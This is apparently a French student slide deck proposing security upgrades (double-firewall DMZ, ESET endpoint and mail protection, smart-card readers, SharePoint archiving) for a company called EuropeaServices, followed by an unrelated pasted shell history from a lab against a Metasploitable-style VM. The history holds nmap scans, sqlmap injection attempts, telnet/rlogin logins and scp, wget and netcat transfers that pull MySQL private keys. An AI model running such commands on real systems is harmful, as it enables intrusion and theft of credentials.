--- title: Lot Sécurité description: View the slide with "Slide Mode". --- --- > # Lot 11 : Conception et mise en place d’une solution Sécurité --- Toutes les sociétés, quelle que soit leur taille activité, sont confrontées à des problématiques de sécurité informatique en entreprise. De nombreuses menaces pèsent sur l'infrastructure ainsi que sur les données et nous devons nous mettre rapidement en oeuvre tous les dispositifs nécessaires pour assurer la protection. La plupart des entreprises subissent en moyenne 4 cyber-attaques par an, et bien que le risque zéro n’existe pas, de nombreuses solutions permettent de les éviter. --- # Sécurité chez EuropeaServices Premièrement nous allons voir le niveau de sécurité chez EuropeaServices ensuite les solutions proposées par COUNTER IT. Europeaservices est constitué actuellement de deux sites se trouvant sur Paris 11 et à la Défense avec 500 salariés. Il souhaite évoluer en créant deux autres sites à Lyon et à Nantes pour s’agrandir avec 200 salariés en plus. Vers la fin de l'année 2019, EuropeaService souhaite s'engager dans le réaménagement complet de ses sites à la Défense et à Paris 11 en flex Office (Open Space). Ce changement vers l'open space nécessite quelques modifications dans l'utilisation du matériel. C'est un grand défi pour nous d'assurer la communication, la sécurité et la rapidité dans le travail quotidien des collaborateurs. Voici quelques solutions que nous proposons pour améliorer leur sécurité : ## 1. Mise en place d'une DMZ entre deux firewalls. Dès que l'on souhaite utiliser une connexion Internet pour des applications plus avancées se fait ressentir le besoin de disposer de plus d'un niveau de sécurité. La connexion du réseau de l'entreprise vers Internet peut impliquer également la mise en place d'un certain nombre de services réseaux visibles depuis Internet : serveur HTTP, serveur de messagerie par exemple. Dans ce cas, les besoins associés à ces serveurs se situent dans un niveau de sécurité élévé : ils ne bénéficient pas du même niveau de protection que les machines du réseau interne (totalement masquées, mais inatteignables), mais généralement on souhaite ne pas les exposer directement sur Internet et assurer leur protection. Les sites d'EuropeaServices sont sécurisés avec des firewalls de type DELL SonicWALLTZ TZ 500 Network Security Appliance de 1.400 Mbps. Nous aimerons proposer 2 models fortigate pour remplacer et renforcer la sécurité de l'entreprise. ![](https://i.imgur.com/6IMBuQf.png) ![](https://i.imgur.com/AzIiXKr.png) ![](https://i.imgur.com/e1hnPjc.png) On peut aussi envisager d'utiliser deux équipements : un firewall interne et un firewall externe. Le firewall interne est configuré pour protéger le réseau local tout en lui permettant d'accéder à Internet et aux serveurs publics de l'entreprise. Le firewall externe autorise les connexions entrantes à destination des serveurs publics. Cette solution est connu sous le nom de DMZ sandwich. Nous avons constaté qu'EuropeaServices avait mis en place une DMZ pour sécuriser le réseau interne. Mais nous proposons d'améliorer avec une infrastructure qui est composé d'une DMZ entre deux firewalls comme indiqué sur le schéma ci-dessous. ![](https://i.imgur.com/56DrX3L.png) ## 2. Solution Anti-Virus et Anti-Spam La messagerie est le principal point d’entrée des menaces informatiques. Les virus, malwares et logiciels espions se diffusent principalement par l’intermédiaire des pièces jointes et emails. D’autre part, des cybercriminels peuvent tenter des attaques pour tromper les collaborateurs et obtenir des données capitales comme des mots de passe par exemple. Nous devrons impérativement sécuriser le mieux possible la messagerie d’entreprise en installant des système anti-virus et anti-spams efficaces. Pour cela, nous proposons la solution E-SET, le pack de sécurité informatique avancée pour les entreprises. E-SET nous propose plusieurs solutions de sécurité informatique : ### ESET Dynamic Endpoint Protection 1.1. Security Management Center : est une console Web qui offre une visibilité en temps réel de tous les endpoints sur site et hors site. C'est une console intuitive et facile qui possède : - une visibilité complète du réseau - Gestion complète de la sécurité - Reporting flexible et détaillé - Gestion centralisée 1.2. Solutions de protection Endpoint : La nouvelle génération de produits ESET pour la protection endpoint combine la prévention contre les malwares, ransomwares et l'exploitation de failles. La technologie multicouche d'ESET est combinée au machine learning, à l'analyse comportementale, au big data. - Endpoint Security : Solution antimalware complète intégrant un pare-feu, le filtrage web et la protection contre les botnets pour Windows et MAC. - Protection des serveurs : Protection antimalware multiplateforme contre les infections par fichier partagé ou par hôte. - ESET Virtualization Security pour VMware : Une solution de sécurité rapide et sans agent pour sécuriser les VMs. ### ESET Dynamic Mail Protection La meilleure solution multi-plateforme pour la protection des emails. La solution est administrable depuis la console de gestion centralisée. Elle permet : - Protection contre le phishing - Filtrage des spams - Protection contre les ransomwares - Détection des attaques zero-day - Gestion centralisée ## 3. Solution sécurité avec une carte à puce ### Le chaos des mots de passe trop nombreux Des risques accrus, la complexité toujours plus grande de l’utilisation du matériel informatique et l’accès à distance aux réseaux d’entreprise rendent les procédures d’identification de plus en plus compliquées. Les clients de messagerie, bases de données, applications spécifiques type ERP ou CRM, les "salles virtuelles" sécurisées, l’intranet : tout cela augmente le nombre de mots de passe, codes PIN ou ID d’accès. La sécurisation des mots de passe est donc une question très problématique. L’association "nom d’utilisateur"/"mot de passe" n’est souvent pas suffisante pour s’assurer que des données critiques gardent une protection fiable contre des accès non autorisés. De plus, stressés ou incapables de tout retenir, les utilisateurs d'EuropeaServices font souvent la grave erreur de noter leurs mots de passe sur des supports non protégés tels que leur téléphone portable ou leur répertoire. ### La solution de cartes à puce Pour parer aux risques liés aux mots de passe, les cartes à puces sont maintenant une solution technique reconnue dans le monde entier. Comparés aux cartes à piste magnétique, ces "mini ordinateurs" peuvent être utilisés dans une plus large gamme de situations et être lus jusqu’à 100 000 fois, soit une durée de vie bien plus longue. Ils ne sont pas affectés par les champs magnétiques et grâce à une protection intégrée contre les surtensions ils sont également à l’abri des décharges électriques. Donc nous proposons la solution de cartes à puces qui contient un code PIN à 4 chiffres simplifiant les accés vers les applications et les sites du groupe EuropeaServices. Nous avons aussi décidé de mettre en place des lecteurs de cartes à puces à l'entrée des salles serveurs et aussi sur les imprimantes pour mieux sécuriser. Car une sécurisation par carte à puce demande de plus gros efforts pour accéder à un environnement non autorisé. De plus, cela reste une solution très abordable financièrement et rapidement rentabilisée. Pour cela, nous vous proposons le logiciel et les lecteurs de carte à puce : #### Lecteur de cartes monofente LITEO Ingenico ##### Specification : Le lecteur monofente "Plug and Play" (ne nécessite pas de pilotes ou drivers) ! Le LITEO se branche directement au port USB de l'ordinateur et fonctionne sur les environnements suivants : Windows, LINUX (via driver open source), MACOS X (10.4 minimum). Les principaux atouts du lecteur LITEO de Ingenico : - Un rapport qualité / prix inégalé. - Léger : 59 grammes - Dimensions : 8,4 x 6,8 x 1 cm. - Répond aux normes PC/SC et CCID. - Respecte l'environnement : fabriqué sans aucune vis et entièrement recyclable. - Emploi des technologies avancées : USB 2.0, taux de transfert supérieur à 420 Kbps. - Prix : 19,90 € #### Lecteur de cartes à puce OMNIKEY HID 3121 #### Specification - Interface : USB 2.0 - Vitesse de transmission : 12 Mbps - Types de cartes supportés : Cartes à puce 1.8V, 3V et 5V - ISO 7816 Classe A, AB et C - Dimensions : 74 x 64 x 13mm - Poids : 48 gr. Aprox. - Câble connecteur : 150 cm - Prix : ![](https://i.imgur.com/PoPVLur.png) ## 4. Dématérialisation des documents sur SharePoint Les gestionnaires de la RH d'EuropeaServices reçoivent encore des documents par courriers. Ces documents sont donc imprimés, classés et stockés dans les locaux de l'entreprises. Nous avons aussi remarqué que les gestionnaires perdent énormement de temps pour stocker et aussi pour chercher des documents. Nous propons donc de remplacer ce systeme d'archivage par des sites Sharepoint Online. #### SharePoint Online SharePoint est une plateforme de collaboration basée sur site Web qui utilise des applications de workflow, des bases de données « listes » et d’autres composants WebParts, ainsi que des fonctions de sécurité pour permettre aux équipes professionnelles de collaborer. SharePoint permet aussi à l’entreprise qui utilise la plateforme de contrôler l’accès à l’information et d’automatiser les processus de workflow dans l’ensemble des unités commerciales.SharePoint permet d’augmenter la productivité et la visibilité des professionnels de l’information dans tous les secteurs et dans des entreprises de toutes tailles. Les fonctionnalités de SharePoint sont axées sur une expérience de collaboration transversale basée sur l’intranet permettant le partage sécurisé, la gestion du contenu et la collaboration sur des workflows, ainsi que de nombreuses autres fonctions. SharePoint donne aussi la possibilité à ses utilisateurs de télécharger des documents et les partager immédiatement avec d’autres personnes ayant besoin de les voir. Il est également facile d’envoyer des liens vers les documents partagés ou les espaces de collaboration par e-mail, ce qui permet aux utilisateurs d’accéder facilement et sans détour aux données qu’ils souhaitent consulter. Annexe - Dynamic EndPoint Protection ![](https://i.imgur.com/F9ZCXvc.png) - Cloud Administrator ![](https://i.imgur.com/4PHvsJO.png) ![](https://i.imgur.com/em8cqE5.png) TO-DO Devis antivirus E-SET Devis logiciel lecteur de carte a puce 1 cp VMwareTools-10.3.10-13959562.tar.gz /tmp/ 2 cd /tmp/ 3 ls 4 tar -xvf VMwareTools-10.3.10-13959562.tar.gz 5 ls 6 cd vmware-tools-distrib/ 7 ls 8 ./vmware-install.pl 9 ifconfig 10 ping 192.168.80.129 11 netstat -b 12 netstat -r 13 netstat -s 14 netstat 15 nmap 16 nmap -b 192.168.80.129 17 nmap -Pn 192.168.80.129 18 ./urlopen 192.168.80.129 19 xdg-open http://192.168.20.129 20 xdg-open http://192.168.80.129 21 xdg-open http://192.168.80.129/phpinfo 22 sqlmap -u 192.168.80.129/phpinfo 23 sqlmap -u 192.168.80.129/phpinfo -dbs 24 sqlmap 192.168.80.129/phpinfo -dbs 25 sqlmap 192.168.80.129/phpinfo --dbs 26 apt install --only-upgrade sqlmap 27 sqlmap -u 192.168.80.129/phpinfo --dbs 28 apt install --only-upgrade sqlmap 29 sqlmap -u 192.168.80.129/phpinfo --dbs 30 sqlmap -u 192.168.80.129 --dbs 31 sqlmap -u 192.168.80.129/index.php?id=1 --dbs 32 sqlmap -u http://192.168.80.129/index.php?id=1 33 sqlmap -u http://192.168.80.129/index.php?id=1 --dbs 34 sqlmap -u http://192.168.80.129/index.php? --dbs 35 sqlmap -u http://192.168.80.129/index.php?id=11 --dbs 36 sqlmap -u http://192.168.80.129/phpinfo --dbs 37 sqlmap -u http://192.168.80.129/phpinfo --dbs --tamper 38 sqlmap -u http://192.168.80.129/phpinfo --tamper 39 arp-scan -1 40 arp-scan -l 41 sqlmap -u http://192.168.80.129/phpinfo --dbs 42 clear 43 arp-scan -1 44 arp-scan -l 45 clear 46 arp-scan -l 47 xdg-open http://192.168.80.129 48 sqlmap -u http://192.168.80.129/phpMyAdmin/?id=1 --dbs 49 sqlmap -u http://192.168.80.129/phpMyAdmin/ --dbs 50 apt-get install sqlmap 51 apt-get update 52 apt-get install sqlmap 53 arp-scan -l 54 xdg-open http://192.168.80.129/phpmyadmin 55 xdg-open http://192.168.80.129/phpMyAdmin/id=1 56 sqlmap -u http://192.168.80.129/phpMyAdmin/?id=100 --dbs 57 sqlmap -u http://192.168.80.129/phpMyAdmin/?id=* --dbs 58 nmap -sV 192.168.80.129 | grep ftp 59 nmap -sV 192.168.80.129 60 nmap -sV 192.168.80.129 | grep ftp 61 nmap -sV -A 192.168.80.129 | grep ftp 62 ftp 192.168.80.129 63 nmap -sV -A 192.168.80.129 | grep ftp 64 ftp 192.168.80.129 65 nmap -sV 192.168.80.129 66 nmap -sV -A 192.168.80.129 | grep telnet 67 telnet 192.168.80.129 68 telnet 192.168.80.129 69 ssh msfadmin@192.168.80.129 70 scp msfadmin@192.168.80.129:/vulnerable 71 scp msfadmin@192.168.80.129:/vulnerable /tmp/test/ 72 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/ 73 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/test.pem 74 touch /tmp/test/test.pem 75 mkdir /tmp/test/ 76 touch /tmp/test/test.pem 77 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/test.pem 78 cat /tmp/test/test.pem 79 nano /tmp/test/test.pem 80 cd /tmp/test/ 81 ls 82 rm test.pem 83 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/test.pem 84 ls 85 nano test.pem 86 rm test.pem 87 ls 88 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/server-key.pem /tmp/test/ 89 ls 90 nano server-key.pem 91 scp msfadmin@192.168.80.129:vulnerable/mysql-ssl/mysql-keys/client-cert.pem /tmp/test/ 92 vim client-cert.pem 93 rlogin 192.168.80.129 94 rlogin -l msfadmin@192.168.80.129 95 rlogin -l msfadmin 192.168.80.129 96 man ettercap 97 ettercap 98 ettercap 192.168.80.129 99 ettercap 100 exit 101 nc -l -p 23 > test.pem 102 nc -l -p 23 > server-key.pem 103 nc -l -p 23 > test 104 ls 105 nano server-key.pem 106 rm server-key.pem 107 rm test 108 rm test.pem 109 ls 110 clear 111 l;s 112 ls 113 clear 114 cd .. 115 ls 116 wget -q http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys 117 ls 118 wget -q http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys /tmp/ 119 ls 120 cd tmp/ 121 ls 122 wget -q http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/ 123 ls 124 xdg-open http://192.168.80.128/vulnerable/mysql-ssl/mysql-keys/server-keys 125 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/ 126 ls 127 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/test.pem 128 ls 129 cd .. 130 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/test.pem 131 ls 132 cd tmp/ 133 ls 134 wget -q http://192.168.80.129/vulnerable/mysql-ssl/mysql-keys/server-keys.pem /tmp/test.pem 135 wget -q http://192.168.80.129/phpinfo /tmp/test.pem 136 ls 137 cat phpinfo 138 telnet 192.168.80.129 139 ls 140 cd /tmp/ 141 ls 142 cd 143 ls 144 cd .. 145 ls 146 cd tmp/ 147 ls 148 cd .. 149 cd 150 ls 151 cd .. 152 ls 153 ssh msfadmin@192.168.80.129 154 ssh -l admin-f2i 192.168.80.129 155 ssh -l user 192.168.80.129 156 rlogin msfadmin 192.168.80.129 157 rlogin 192.168.80.129 158 rlogin -l msfadmin 192.168.80.129 159 exit 160 history